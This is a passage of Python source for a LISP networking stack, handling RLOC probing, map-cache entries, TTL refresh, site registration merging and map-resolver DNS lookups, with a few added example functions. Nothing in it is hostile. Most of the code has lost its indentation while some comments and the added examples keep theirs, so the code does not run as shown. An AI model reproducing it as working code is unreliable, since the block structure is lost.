e = green(lisp_print_eid_tuple(eid, group), False)
lprint((" Received {} from {}{} for {}, {}, rtt {}{}, " + \
"to-ttl/from-ttl {}{}").format(probe, red(addr_str, False), p, e,
state_string, rtt, nh, str(hc) + "/" + str(ttl), lat))
if (rloc.rloc_next_hop == None): return
#
# Now select better RTT next-hop.
#
rloc = None
install = None
while (True):
rloc = self if rloc == None else rloc.next_rloc
if (rloc == None): break
if (rloc.up_state() == False): continue
if (rloc.rloc_probe_rtt == -1): continue
if (install == None): install = rloc
if (rloc.rloc_probe_rtt < install.rloc_probe_rtt): install = rloc
#endwhile
if (install != None):
d, n = install.rloc_next_hop
nh = bold("nh {}({})".format(n, d), False)
lprint(" Install host-route via best {}".format(nh))
lisp_install_host_route(addr_str, None, False)
lisp_install_host_route(addr_str, n, True)
#endif
#enddef
def add_to_rloc_probe_list(self, eid, group):
addr_str = self.rloc.print_address_no_iid()
port = self.translated_port
if (port != 0): addr_str += ":" + str(port)
if (lisp_rloc_probe_list.has_key(addr_str) == False):
lisp_rloc_probe_list[addr_str] = []
#endif
if (group.is_null()): group.instance_id = 0
for r, e, g in lisp_rloc_probe_list[addr_str]:
if (e.is_exact_match(eid) and g.is_exact_match(group)):
if (r == self):
if (lisp_rloc_probe_list[addr_str] == []):
lisp_rloc_probe_list.pop(addr_str)
#endif
return
#endif
lisp_rloc_probe_list[addr_str].remove([r, e, g])
break
#endif
#endfor
lisp_rloc_probe_list[addr_str].append([self, eid, group])
#
# Copy reach/unreach state from first RLOC that the active RLOC-probing
# is run on.
#
rloc = lisp_rloc_probe_list[addr_str][0][0]
if (rloc.state == LISP_RLOC_UNREACH_STATE):
self.state = LISP_RLOC_UNREACH_STATE
self.last_state_change = lisp_get_timestamp()
#endif
#enddef
def delete_from_rloc_probe_list(self, eid, group):
addr_str = self.rloc.print_address_no_iid()
port = self.translated_port
if (port != 0): addr_str += ":" + str(port)
if (lisp_rloc_probe_list.has_key(addr_str) == False): return
array = []
for entry in lisp_rloc_probe_list[addr_str]:
if (entry[0] != self): continue
if (entry[1].is_exact_match(eid) == False): continue
if (entry[2].is_exact_match(group) == False): continue
array = entry
break
#endfor
if (array == []): return
try:
lisp_rloc_probe_list[addr_str].remove(array)
if (lisp_rloc_probe_list[addr_str] == []):
lisp_rloc_probe_list.pop(addr_str)
#endif
except:
return
#endtry
#enddef
def print_rloc_probe_state(self, trailing_linefeed):
output = ""
rloc = self
while (True):
sent = rloc.last_rloc_probe
if (sent == None): sent = 0
resp = rloc.last_rloc_probe_reply
if (resp == None): resp = 0
rtt = rloc.print_rloc_probe_rtt()
s = space(4)
if (rloc.rloc_next_hop == None):
output += "RLOC-Probing:\n"
else:
d, n = rloc.rloc_next_hop
output += "RLOC-Probing for nh {}({}):\n".format(n, d)
#endif
output += ("{}RLOC-probe request sent: {}\n{}RLOC-probe reply " + \
"received: {}, rtt {}").format(s, lisp_print_elapsed(sent),
s, lisp_print_elapsed(resp), rtt)
if (trailing_linefeed): output += "\n"
rloc = rloc.next_rloc
if (rloc == None): break
output += "\n"
#endwhile
return(output)
#enddef
def get_encap_keys(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.rloc.print_address_no_iid() + ":" + port
try:
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]): return(keys[1].encrypt_key, keys[1].icv_key)
return(None, None)
except:
return(None, None)
#endtry
#enddef
def rloc_recent_rekey(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.rloc.print_address_no_iid() + ":" + port
try:
key = lisp_crypto_keys_by_rloc_encap[addr_str][1]
if (key == None): return(False)
if (key.last_rekey == None): return(True)
return(time.time() - key.last_rekey < 1)
except:
return(False)
#endtry
#enddef
#endclass
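#
# Illustrative sketch, not part of the original module: an RTR is
# advertised in an RLOC-set with the fixed priority/weight fingerprint
# 254/0 (and multicast 255/0), which is exactly what is_rtr() tests.
#
def lisp_rloc_rtr_example():
    rloc = lisp_rloc(False)
    rloc.priority, rloc.weight = 254, 0
    rloc.mpriority, rloc.mweight = 255, 0
    return(rloc.is_rtr())
#enddef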
class lisp_mapping():
def __init__(self, eid, group, rloc_set):
self.eid = eid
if (eid == ""): self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = group
if (group == ""): self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.rloc_set = rloc_set
self.best_rloc_set = []
self.build_best_rloc_set()
self.uptime = lisp_get_timestamp()
self.action = LISP_NO_ACTION
self.expires = None
self.map_cache_ttl = None
self.last_refresh_time = self.uptime
self.source_cache = None
self.map_replies_sent = 0
self.mapping_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.use_mr_name = "all"
self.use_ms_name = "all"
self.stats = lisp_stats()
self.dynamic_eids = None
self.checkpoint_entry = False
self.secondary_iid = None
self.signature_eid = False
self.gleaned = False
self.recent_sources = {}
self.last_multicast_map_request = 0
#enddef
def print_mapping(self, eid_indent, rloc_indent):
ts = lisp_print_elapsed(self.uptime)
group = "" if self.group.is_null() else \
", group {}".format(self.group.print_prefix())
lprint("{}eid {}{}, uptime {}, {} rlocs:".format(eid_indent,
green(self.eid.print_prefix(), False), group, ts,
len(self.rloc_set)))
for rloc in self.rloc_set: rloc.print_rloc(rloc_indent)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_ttl(self):
ttl = self.map_cache_ttl
if (ttl == None): return("forever")
if (ttl >= 3600):
if ((ttl % 3600) == 0):
ttl = str(ttl/3600) + " hours"
else:
                ttl = str(ttl/60) + " mins"
#endif
elif (ttl >= 60):
if ((ttl % 60) == 0):
ttl = str(ttl/60) + " mins"
else:
ttl = str(ttl) + " secs"
#endif
else:
ttl = str(ttl) + " secs"
#endif
return(ttl)
#enddef
def refresh(self):
if (self.group.is_null()): return(self.refresh_unicast())
return(self.refresh_multicast())
#enddef
def refresh_unicast(self):
return(self.is_active() and self.has_ttl_elapsed() and
self.gleaned == False)
#enddef
def refresh_multicast(self):
#
        # Take the entry's uptime modulo the TTL; refresh when we land in
        # the first few seconds of a new TTL interval (elapsed 0, 1, or 2).
#
elapsed = int((time.time() - self.uptime) % self.map_cache_ttl)
refresh = (elapsed in [0, 1, 2])
if (refresh == False): return(False)
#
# Don't send a refreshing Map-Request if we just sent one.
#
rate_limit = ((time.time() - self.last_multicast_map_request) <= 2)
if (rate_limit): return(False)
self.last_multicast_map_request = lisp_get_timestamp()
return(True)
#enddef
def has_ttl_elapsed(self):
if (self.map_cache_ttl == None): return(False)
elapsed = time.time() - self.last_refresh_time
if (elapsed >= self.map_cache_ttl): return(True)
#
        # TTL is about to elapse. Refresh the entry once 90% of the TTL
        # has passed, i.e., within the last 10% of its lifetime.
#
almost_ttl = self.map_cache_ttl - (self.map_cache_ttl / 10)
if (elapsed >= almost_ttl): return(True)
return(False)
#enddef
def is_active(self):
if (self.stats.last_increment == None): return(False)
elapsed = time.time() - self.stats.last_increment
return(elapsed <= 60)
#enddef
def match_eid_tuple(self, db):
if (self.eid.is_exact_match(db.eid) == False): return(False)
if (self.group.is_exact_match(db.group) == False): return(False)
return(True)
#enddef
def sort_rloc_set(self):
self.rloc_set.sort(key=operator.attrgetter('rloc.address'))
#enddef
def delete_rlocs_from_rloc_probe_list(self):
for rloc in self.best_rloc_set:
rloc.delete_from_rloc_probe_list(self.eid, self.group)
#endfor
#enddef
def build_best_rloc_set(self):
old_best = self.best_rloc_set
self.best_rloc_set = []
if (self.rloc_set == None): return
#
# Get best priority for first up RLOC.
#
pr = 256
for rloc in self.rloc_set:
if (rloc.up_state()): pr = min(rloc.priority, pr)
        #endfor
#
# For each up RLOC with best priority, put in best-rloc for data-plane.
# For each unreachable RLOC that has better priority than the best
# computed above, we want to RLOC-probe. So put in the RLOC probe list
# and best list. We need to set the timestamp last_rloc_probe or
# lisp_process_rloc_probe_timer() will think the unreach RLOC went
# down and is waiting for an RLOC-probe reply (it will never get).
#
for rloc in self.rloc_set:
if (rloc.priority <= pr):
if (rloc.unreach_state() and rloc.last_rloc_probe == None):
rloc.last_rloc_probe = lisp_get_timestamp()
#endif
self.best_rloc_set.append(rloc)
#endif
#endfor
#
# Put RLOC in lisp.lisp_rloc_probe_list if doesn't exist. And if
# we removed the RLOC out of the best list, we need to remove
# references.
#
for rloc in old_best:
if (rloc.priority < pr): continue
rloc.delete_from_rloc_probe_list(self.eid, self.group)
#endfor
for rloc in self.best_rloc_set:
if (rloc.rloc.is_null()): continue
rloc.add_to_rloc_probe_list(self.eid, self.group)
#endfor
#enddef
def select_rloc(self, lisp_packet, ipc_socket):
packet = lisp_packet.packet
inner_version = lisp_packet.inner_version
length = len(self.best_rloc_set)
if (length == 0):
self.stats.increment(len(packet))
return([None, None, None, self.action, None, None])
#endif
ls = 4 if lisp_load_split_pings else 0
hashval = lisp_packet.hash_ports()
if (inner_version == 4):
for i in range(8+ls):
hashval = hashval ^ struct.unpack("B", packet[i+12])[0]
#endfor
elif (inner_version == 6):
for i in range(0, 32+ls, 4):
hashval = hashval ^ struct.unpack("I", packet[i+8:i+12])[0]
#endfor
hashval = (hashval >> 16) + (hashval & 0xffff)
hashval = (hashval >> 8) + (hashval & 0xff)
else:
for i in range(0, 12+ls, 4):
hashval = hashval ^ struct.unpack("I", packet[i:i+4])[0]
#endfor
#endif
if (lisp_data_plane_logging):
best = []
for r in self.best_rloc_set:
if (r.rloc.is_null()): continue
best.append([r.rloc.print_address_no_iid(), r.print_state()])
#endfor
dprint("Packet hash {}, index {}, best-rloc-list: {}".format( \
hex(hashval), hashval % length, red(str(best), False)))
#endif
#
# Get hashed value RLOC.
#
rloc = self.best_rloc_set[hashval % length]
#
        # If this RLOC was taken out of up state because echoed-nonces were
        # not being received, try requesting a nonce again after some time.
#
echo_nonce = lisp_get_echo_nonce(rloc.rloc, None)
if (echo_nonce):
echo_nonce.change_state(rloc)
if (rloc.no_echoed_nonce_state()):
echo_nonce.request_nonce_sent = None
#endif
#endif
#
        # Find a reachable RLOC.
#
if (rloc.up_state() == False):
stop = hashval % length
index = (stop + 1) % length
while (index != stop):
rloc = self.best_rloc_set[index]
if (rloc.up_state()): break
index = (index + 1) % length
#endwhile
if (index == stop):
self.build_best_rloc_set()
return([None, None, None, None, None, None])
#endif
#endif
#
# We are going to use this RLOC. Increment statistics.
#
rloc.stats.increment(len(packet))
#
# Give RLE preference.
#
if (rloc.rle_name and rloc.rle == None):
if (lisp_rle_list.has_key(rloc.rle_name)):
rloc.rle = lisp_rle_list[rloc.rle_name]
#endif
#endif
if (rloc.rle): return([None, None, None, None, rloc.rle, None])
#
# Next check if ELP is cached for this RLOC entry.
#
if (rloc.elp and rloc.elp.use_elp_node):
return([rloc.elp.use_elp_node.address, None, None, None, None,
None])
#endif
#
# Return RLOC address.
#
rloc_addr = None if (rloc.rloc.is_null()) else rloc.rloc
port = rloc.translated_port
action = self.action if (rloc_addr == None) else None
#
        # Check to see if we are requesting a nonce to be echoed, or we are
# echoing a nonce.
#
nonce = None
if (echo_nonce and echo_nonce.request_nonce_timeout() == False):
nonce = echo_nonce.get_request_or_echo_nonce(ipc_socket, rloc_addr)
#endif
#
# If no RLOC address, check for native-forward.
#
return([rloc_addr, port, nonce, action, None, rloc])
#enddef
def do_rloc_sets_match(self, rloc_address_set):
if (len(self.rloc_set) != len(rloc_address_set)): return(False)
#
# Compare an array of lisp_address()es with the lisp_mapping()
# rloc-set which is an array of lisp_rloc()s.
#
for rloc_entry in self.rloc_set:
for rloc in rloc_address_set:
if (rloc.is_exact_match(rloc_entry.rloc) == False): continue
rloc = None
break
#endfor
if (rloc == rloc_address_set[-1]): return(False)
#endfor
return(True)
#enddef
def get_rloc(self, rloc):
for rloc_entry in self.rloc_set:
r = rloc_entry.rloc
if (rloc.is_exact_match(r)): return(rloc_entry)
#endfor
return(None)
#enddef
def get_rloc_by_interface(self, interface):
for rloc_entry in self.rloc_set:
if (rloc_entry.interface == interface): return(rloc_entry)
#endfor
return(None)
#enddef
def add_db(self):
if (self.group.is_null()):
lisp_db_for_lookups.add_cache(self.eid, self)
else:
db = lisp_db_for_lookups.lookup_cache(self.group, True)
if (db == None):
db = lisp_mapping(self.group, self.group, [])
lisp_db_for_lookups.add_cache(self.group, db)
#endif
db.add_source_entry(self)
#endif
#enddef
def add_cache(self, do_ipc=True):
if (self.group.is_null()):
lisp_map_cache.add_cache(self.eid, self)
if (lisp_program_hardware): lisp_program_vxlan_hardware(self)
else:
mc = lisp_map_cache.lookup_cache(self.group, True)
if (mc == None):
mc = lisp_mapping(self.group, self.group, [])
mc.eid.copy_address(self.group)
mc.group.copy_address(self.group)
lisp_map_cache.add_cache(self.group, mc)
#endif
if (self.eid.is_null()): self.eid.make_default_route(mc.group)
mc.add_source_entry(self)
#endif
if (do_ipc): lisp_write_ipc_map_cache(True, self)
#enddef
def delete_cache(self):
self.delete_rlocs_from_rloc_probe_list()
lisp_write_ipc_map_cache(False, self)
if (self.group.is_null()):
lisp_map_cache.delete_cache(self.eid)
if (lisp_program_hardware):
prefix = self.eid.print_prefix_no_iid()
os.system("ip route delete {}".format(prefix))
#endif
else:
mc = lisp_map_cache.lookup_cache(self.group, True)
if (mc == None): return
smc = mc.lookup_source_cache(self.eid, True)
if (smc == None): return
mc.source_cache.delete_cache(self.eid)
if (mc.source_cache.cache_size() == 0):
lisp_map_cache.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_mc):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_mc.eid, source_mc)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def dynamic_eid_configured(self):
return(self.dynamic_eids != None)
#enddef
def star_secondary_iid(self, prefix):
if (self.secondary_iid == None): return(prefix)
iid = "," + str(self.secondary_iid)
return(prefix.replace(iid, iid + "*"))
#enddef
def increment_decap_stats(self, packet):
port = packet.udp_dport
if (port == LISP_DATA_PORT):
rloc = self.get_rloc(packet.outer_dest)
else:
#
# Only works with one translated RLOC.
#
for rloc in self.rloc_set:
if (rloc.translated_port != 0): break
#endfor
#endif
if (rloc != None): rloc.stats.increment(len(packet.packet))
self.stats.increment(len(packet.packet))
#enddef
def rtrs_in_rloc_set(self):
for rloc in self.rloc_set:
if (rloc.is_rtr()): return(True)
#endfor
return(False)
#enddef
def add_recent_source(self, source):
self.recent_sources[source.print_address()] = lisp_get_timestamp()
#enddef
#endclass
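#
# Illustrative sketch, not part of the original module: map-cache TTL
# bookkeeping on a freshly created entry. The TTL is stored in seconds;
# print_ttl() renders it and has_ttl_elapsed() stays False until 90%
# of the TTL has passed. The empty eid/group and TTL are arbitrary.
#
def lisp_mapping_ttl_example():
    mc = lisp_mapping("", "", [])
    mc.map_cache_ttl = 7200
    return(mc.print_ttl(), mc.has_ttl_elapsed())
#enddef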
class lisp_dynamic_eid():
def __init__(self):
self.dynamic_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.uptime = lisp_get_timestamp()
self.interface = None
self.last_packet = None
self.timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
#enddef
def get_timeout(self, interface):
try:
lisp_interface = lisp_myinterfaces[interface]
self.timeout = lisp_interface.dynamic_eid_timeout
except:
self.timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
#endtry
#enddef
#endclass
class lisp_group_mapping():
def __init__(self, group_name, ms_name, group_prefix, sources, rle_addr):
self.group_name = group_name
self.group_prefix = group_prefix
self.use_ms_name = ms_name
self.sources = sources
self.rle_address = rle_addr
#enddef
def add_group(self):
lisp_group_mapping_list[self.group_name] = self
#enddef
#endclass
#
# lisp_is_group_more_specific
#
# Take group address in string format and see if it is more specific than
# the group-prefix in class lisp_group_mapping(). If more specific, return
# mask-length, otherwise return -1.
#
def lisp_is_group_more_specific(group_str, group_mapping):
iid = group_mapping.group_prefix.instance_id
mask_len = group_mapping.group_prefix.mask_len
group = lisp_address(LISP_AFI_IPV4, group_str, 32, iid)
if (group.is_more_specific(group_mapping.group_prefix)): return(mask_len)
return(-1)
#enddef
#
# lisp_lookup_group
#
# Lookup group address in lisp_group_mapping_list{}.
#
def lisp_lookup_group(group):
best = None
for gm in lisp_group_mapping_list.values():
mask_len = lisp_is_group_more_specific(group, gm)
if (mask_len == -1): continue
if (best == None or mask_len > best.group_prefix.mask_len): best = gm
#endfor
return(best)
#enddef
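#
# Illustrative sketch, not part of the original module: register a
# hypothetical group-mapping for 224.1.0.0/16 and look it up with a
# group address inside that prefix. lisp_lookup_group() returns the
# longest-matching lisp_group_mapping(), or None.
#
def lisp_lookup_group_example():
    gp = lisp_address(LISP_AFI_IPV4, "224.1.0.0", 16, 0)
    gm = lisp_group_mapping("example-group", "all", gp, [], None)
    gm.add_group()
    return(lisp_lookup_group("224.1.1.1") == gm)
#enddef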
lisp_site_flags = {
"P": "ETR is {}Requesting Map-Server to Proxy Map-Reply",
"S": "ETR is {}LISP-SEC capable",
"I": "xTR-ID and site-ID are {}included in Map-Register",
"T": "Use Map-Register TTL field to timeout registration is {}set",
"R": "Merging registrations are {}requested",
"M": "ETR is {}a LISP Mobile-Node",
"N": "ETR is {}requesting Map-Notify messages from Map-Server"
}
class lisp_site():
def __init__(self):
self.site_name = ""
self.description = ""
self.shutdown = False
self.auth_sha1_or_sha2 = False
self.auth_key = {}
self.encryption_key = None
self.allowed_prefixes = {}
self.allowed_prefixes_sorted = []
self.allowed_rlocs = {}
self.map_notifies_sent = 0
self.map_notify_acks_received = 0
#enddef
#endclass
class lisp_site_eid():
def __init__(self, site):
self.site = site
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.first_registered = 0
self.last_registered = 0
self.last_registerer = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
self.registered = False
self.registered_rlocs = []
self.auth_sha1_or_sha2 = False
self.individual_registrations = {}
self.map_registers_received = 0
self.proxy_reply_requested = False
self.force_proxy_reply = False
self.force_nat_proxy_reply = False
self.force_ttl = None
self.pitr_proxy_reply_drop = False
self.proxy_reply_action = ""
self.lisp_sec_present = False
self.map_notify_requested = False
self.mobile_node_requested = False
self.echo_nonce_capable = False
self.use_register_ttl_requested = False
self.merge_register_requested = False
self.xtr_id_present = False
self.xtr_id = 0
self.site_id = 0
self.accept_more_specifics = False
self.parent_for_more_specifics = None
self.dynamic = False
self.more_specific_registrations = []
self.source_cache = None
self.inconsistent_registration = False
self.policy = None
self.require_signature = False
self.encrypt_json = False
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_flags(self, html):
if (html == False):
output = "{}-{}-{}-{}-{}-{}-{}".format( \
"P" if self.proxy_reply_requested else "p",
"S" if self.lisp_sec_present else "s",
"I" if self.xtr_id_present else "i",
"T" if self.use_register_ttl_requested else "t",
"R" if self.merge_register_requested else "r",
"M" if self.mobile_node_requested else "m",
"N" if self.map_notify_requested else "n")
else:
bits = self.print_flags(False)
bits = bits.split("-")
output = ""
for bit in bits:
bit_str = lisp_site_flags[bit.upper()]
bit_str = bit_str.format("" if bit.isupper() else "not ")
output += lisp_span(bit, bit_str)
if (bit.lower() != "n"): output += "-"
#endfor
#endif
return(output)
#enddef
def copy_state_to_parent(self, child):
self.xtr_id = child.xtr_id
self.site_id = child.site_id
self.first_registered = child.first_registered
self.last_registered = child.last_registered
self.last_registerer = child.last_registerer
self.register_ttl = child.register_ttl
if (self.registered == False):
self.first_registered = lisp_get_timestamp()
#endif
self.auth_sha1_or_sha2 = child.auth_sha1_or_sha2
self.registered = child.registered
self.proxy_reply_requested = child.proxy_reply_requested
self.lisp_sec_present = child.lisp_sec_present
self.xtr_id_present = child.xtr_id_present
self.use_register_ttl_requested = child.use_register_ttl_requested
self.merge_register_requested = child.merge_register_requested
self.mobile_node_requested = child.mobile_node_requested
self.map_notify_requested = child.map_notify_requested
#enddef
def build_sort_key(self):
sort_cache = lisp_cache()
ml, key = sort_cache.build_key(self.eid)
gkey = ""
if (self.group.is_null() == False):
gml, gkey = sort_cache.build_key(self.group)
gkey = "-" + gkey[0:12] + "-" + str(gml) + "-" + gkey[12::]
#endif
key = key[0:12] + "-" + str(ml) + "-" + key[12::] + gkey
del(sort_cache)
return(key)
#enddef
def merge_in_site_eid(self, child):
rle_changed = False
if (self.group.is_null()):
self.merge_rlocs_in_site_eid()
else:
rle_changed = self.merge_rles_in_site_eid()
#endif
#
# If a child registration was passed, copy some fields to the parent
# copy.
#
if (child != None):
self.copy_state_to_parent(child)
self.map_registers_received += 1
#endif
return(rle_changed)
#enddef
def copy_rloc_records(self):
new_list = []
for rloc_entry in self.registered_rlocs:
new_list.append(copy.deepcopy(rloc_entry))
#endfor
return(new_list)
#enddef
def merge_rlocs_in_site_eid(self):
self.registered_rlocs = []
for site_eid in self.individual_registrations.values():
if (self.site_id != site_eid.site_id): continue
if (site_eid.registered == False): continue
self.registered_rlocs += site_eid.copy_rloc_records()
#endfor
#
# Remove duplicate RLOC addresses if multiple ETRs registered with
# the same RTR-set.
#
new_list = []
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rloc.is_null() or len(new_list) == 0):
new_list.append(rloc_entry)
continue
#endif
for re in new_list:
if (re.rloc.is_null()): continue
if (rloc_entry.rloc.is_exact_match(re.rloc)): break
#endfor
if (re == new_list[-1]): new_list.append(rloc_entry)
#endfor
self.registered_rlocs = new_list
#
# Removal case.
#
if (len(self.registered_rlocs) == 0): self.registered = False
return
#enddef
def merge_rles_in_site_eid(self):
#
# Build temporary old list of RLE nodes in dictionary array.
#
old_rle = {}
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rle == None): continue
for rle_node in rloc_entry.rle.rle_nodes:
addr = rle_node.address.print_address_no_iid()
old_rle[addr] = rle_node.address
#endfor
break
        #endfor
#
# Merge in all RLOC entries of an RLOC-set.
#
self.merge_rlocs_in_site_eid()
#
# Remove RLEs that were added as RLOC-records in merge_rlocs_in_
# site_eid(). We only care about the first RLE that is the merged
# set of all the individual registered RLEs. We assume this appears
# first and that all subsequent RLOC-records are the RTR list for
# each registering ETR.
#
new_rloc_list = []
for rloc_entry in self.registered_rlocs:
if (self.registered_rlocs.index(rloc_entry) == 0):
new_rloc_list.append(rloc_entry)
continue
#endif
if (rloc_entry.rle == None): new_rloc_list.append(rloc_entry)
#endfor
self.registered_rlocs = new_rloc_list
#
# Merge RLEs from individuals into master copy and make a temporary
# new_rle list to compare with old_rle. If there is a RLOC-name for
# the RLE, clear it from the merged registration. We want names to
# be per RLE entry and not the RLOC record entry it resides in.
#
rle = lisp_rle("")
new_rle = {}
rloc_name = None
for site_eid in self.individual_registrations.values():
if (site_eid.registered == False): continue
irle = site_eid.registered_rlocs[0].rle
if (irle == None): continue
rloc_name = site_eid.registered_rlocs[0].rloc_name
for irle_node in irle.rle_nodes:
addr = irle_node.address.print_address_no_iid()
if (new_rle.has_key(addr)): break
rle_node = lisp_rle_node()
rle_node.address.copy_address(irle_node.address)
rle_node.level = irle_node.level
rle_node.rloc_name = rloc_name
rle.rle_nodes.append(rle_node)
new_rle[addr] = irle_node.address
#endfor
#endfor
#
# Store new copy.
#
if (len(rle.rle_nodes) == 0): rle = None
if (len(self.registered_rlocs) != 0):
self.registered_rlocs[0].rle = rle
if (rloc_name): self.registered_rlocs[0].rloc_name = None
#endif
#
# Check for changes.
#
if (old_rle.keys() == new_rle.keys()): return(False)
lprint("{} {} from {} to {}".format( \
green(self.print_eid_tuple(), False), bold("RLE change", False),
old_rle.keys(), new_rle.keys()))
return(True)
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_sites_by_eid.add_cache(self.eid, self)
else:
se = lisp_sites_by_eid.lookup_cache(self.group, True)
if (se == None):
se = lisp_site_eid(self.site)
se.eid.copy_address(self.group)
se.group.copy_address(self.group)
lisp_sites_by_eid.add_cache(self.group, se)
#
# See lisp_site_eid_lookup() for special case details for
# longest match looks for (S,G) entries.
#
se.parent_for_more_specifics = self.parent_for_more_specifics
#endif
if (self.eid.is_null()): self.eid.make_default_route(se.group)
se.add_source_entry(self)
#endif
#enddef
def delete_cache(self):
if (self.group.is_null()):
lisp_sites_by_eid.delete_cache(self.eid)
else:
se = lisp_sites_by_eid.lookup_cache(self.group, True)
if (se == None): return
site_eid = se.lookup_source_cache(self.eid, True)
if (site_eid == None): return
if (se.source_cache == None): return
se.source_cache.delete_cache(self.eid)
if (se.source_cache.cache_size() == 0):
lisp_sites_by_eid.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_se):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_se.eid, source_se)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def is_star_g(self):
if (self.group.is_null()): return(False)
return(self.eid.is_exact_match(self.group))
#enddef
def eid_record_matches(self, eid_record):
if (self.eid.is_exact_match(eid_record.eid) == False): return(False)
if (eid_record.group.is_null()): return(True)
return(eid_record.group.is_exact_match(self.group))
#enddef
def inherit_from_ams_parent(self):
parent = self.parent_for_more_specifics
if (parent == None): return
self.force_proxy_reply = parent.force_proxy_reply
self.force_nat_proxy_reply = parent.force_nat_proxy_reply
self.force_ttl = parent.force_ttl
self.pitr_proxy_reply_drop = parent.pitr_proxy_reply_drop
self.proxy_reply_action = parent.proxy_reply_action
self.echo_nonce_capable = parent.echo_nonce_capable
self.policy = parent.policy
self.require_signature = parent.require_signature
self.encrypt_json = parent.encrypt_json
#enddef
def rtrs_in_rloc_set(self):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.is_rtr()): return(True)
#endfor
return(False)
#enddef
def is_rtr_in_rloc_set(self, rtr_rloc):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rloc.is_exact_match(rtr_rloc) == False): continue
if (rloc_entry.is_rtr()): return(True)
#endfor
return(False)
#enddef
def is_rloc_in_rloc_set(self, rloc):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rle):
for rle in rloc_entry.rle.rle_nodes:
if (rle.address.is_exact_match(rloc)): return(True)
#endif
#endif
if (rloc_entry.rloc.is_exact_match(rloc)): return(True)
#endfor
return(False)
#enddef
def do_rloc_sets_match(self, prev_rloc_set):
if (len(self.registered_rlocs) != len(prev_rloc_set)): return(False)
for rloc_entry in prev_rloc_set:
old_rloc = rloc_entry.rloc
if (self.is_rloc_in_rloc_set(old_rloc) == False): return(False)
#endfor
return(True)
#enddef
#endclass
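#
# Illustrative sketch, not part of the original module: the flags line
# printed for a site-EID. Upper-case letters mean the registering ETR
# set the corresponding Map-Register bit (see lisp_site_flags above);
# this example yields "P-s-i-t-R-m-n".
#
def lisp_site_eid_flags_example():
    se = lisp_site_eid(lisp_site())
    se.proxy_reply_requested = True
    se.merge_register_requested = True
    return(se.print_flags(False))
#enddef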
class lisp_mr():
def __init__(self, addr_str, dns_name, mr_name):
self.mr_name = mr_name if (mr_name != None) else "all"
self.dns_name = dns_name
self.map_resolver = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.last_dns_resolve = None
self.a_record_index = 0
if (addr_str):
self.map_resolver.store_address(addr_str)
self.insert_mr()
else:
self.resolve_dns_name()
#endif
self.last_used = 0
self.last_reply = 0
self.last_nonce = 0
self.map_requests_sent = 0
self.neg_map_replies_received = 0
self.total_rtt = 0
#enddef
def resolve_dns_name(self):
if (self.dns_name == None): return
if (self.last_dns_resolve and
time.time() - self.last_dns_resolve < 30): return
try:
addresses = socket.gethostbyname_ex(self.dns_name)
self.last_dns_resolve = lisp_get_timestamp()
a_records = addresses[2]
except:
return
#endtry
#
# Check if number of A-records have changed and this one is no longer
# valid.
#
if (len(a_records) <= self.a_record_index):
self.delete_mr()
return
#endif
addr = a_records[self.a_record_index]
if (addr != self.map_resolver.print_address_no_iid()):
self.delete_mr()
self.map_resolver.store_address(addr)
self.insert_mr()
#endif
#
        # If this is a pull-based LISP-Decent DNS suffix, create a lisp_mr()
        # for each additional A-record. Only the master entry (A-record
        # index 0) does this.
#
if (lisp_is_decent_dns_suffix(self.dns_name) == False): return
if (self.a_record_index != 0): return
for addr in a_records[1::]:
a = lisp_address(LISP_AFI_NONE, addr, 0, 0)
mr = lisp_get_map_resolver(a, None)
if (mr != None and mr.a_record_index == a_records.index(addr)):
continue
#endif
mr = lisp_mr(addr, None, None)
mr.a_record_index = a_records.index(addr)
mr.dns_name = self.dns_name
mr.last_dns_resolve = lisp_get_timestamp()
#endfor
#
# Check for deletes.
#
delete_list = []
for mr in lisp_map_resolvers_list.values():
if (self.dns_name != mr.dns_name): continue
a = mr.map_resolver.print_address_no_iid()
if (a in a_records): continue
delete_list.append(mr)
#endfor
for mr in delete_list: mr.delete_mr()
#enddef
def insert_mr(self):
key = self.mr_name + self.map_resolver.print_address()
lisp_map_resolvers_list[key] = self
#enddef
def delete_mr(self):
key = self.mr_name + self.map_resolver.print_address()
if (lisp_map_resolvers_list.has_key(key) == False): return
lisp_map_resolvers_list.pop(key)
#enddef
#endclass
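#
# Illustrative sketch, not part of the original module: map-resolvers
# are keyed in lisp_map_resolvers_list by mr-name concatenated with the
# resolver address, which insert_mr()/delete_mr() maintain. 192.0.2.1
# is an RFC 5737 documentation address; "example-mr" is hypothetical.
#
def lisp_mr_example():
    mr = lisp_mr("192.0.2.1", None, "example-mr")
    key = mr.mr_name + mr.map_resolver.print_address()
    found = lisp_map_resolvers_list.has_key(key)
    mr.delete_mr()
    return(found)
#enddef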
class lisp_ddt_root():
def __init__(self):
